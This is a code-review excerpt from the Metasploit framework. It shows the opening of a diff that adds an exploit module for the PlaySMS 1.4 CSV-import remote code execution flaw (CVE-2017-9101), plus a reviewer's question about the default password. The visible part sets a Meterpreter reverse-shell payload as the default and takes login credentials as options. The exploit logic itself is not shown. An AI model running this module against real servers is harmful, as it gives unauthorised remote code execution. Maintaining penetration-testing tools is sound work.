modules/exploits/multi/http/playsms_uploadcsv_exec.rb

```diff
@@ -0,0 +1,202 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+    def initialize(info = {})
+        super(update_info(info,
+        'Name' => 'PlaySMS 1.4 - import.php, Authenticated  CSV file upload Remote Code Execution',
+        'Description' => %q{
+            This Module exploits a Authenticated File Upload Remote Code Excution Vulnerability found in PlaySMS Version 1.4.
+            This issue is caused by improper File Contents handling in import.php (aka the Phonebook import feature). Authenticated
+            Users can upload a CSV file containing a malicious payload.
+            Remote Code Execution via vectors involving the User-Agent HTTP header and PHP code in the User-Agent.
+            This module was tested against PlaySMS 1.4 on VulnHub's Dina 1.0 machine and Windows 7.
+        },
+        'Author' =>
+            [
+                'Touhid M.Shaikh <touhidshaikh22[at]gmail.com>' # Discoverys and Metasploit Module
+            ],
+        'License' => MSF_LICENSE,
+        'References' =>
+            [
+                ['CVE','2017-9101'],
+                [ 'URL', 'https://www.youtube.com/watch?v=KIB9sKQdEwE' ],
+                ['EDB', '42044']
+            ],
+        'DefaultOptions' =>
+            {
+                'SSL'     => false,
+                'PAYLOAD' => 'php/meterpreter/reverse_tcp',
+                'ENCODER' => 'php/base64',
+            },
+        'Privileged' => false,
+        'Platform'   => ['php'],
+        'Arch'       => ARCH_PHP,
+        'Targets' =>
+            [
+                [ 'PlaySMS 1.4', { } ],
+            ],
+        'DefaultTarget'  => 0,
+        'DisclosureDate' => 'May 21 2017'))
+
+        register_options(
+            [
+                OptString.new('TARGETURI', [ true, "Base playsms directory path", '/']),
+                OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
+                OptString.new('PASSWORD', [ true, "Password to authenticate with", 'password'])
```

Comment:
Is `password` the default password? It's best to use the application's default password as the default value for `password`. If the application does not have a default password then leave it empty.

Reply:
i just saw on official website default password is "admin"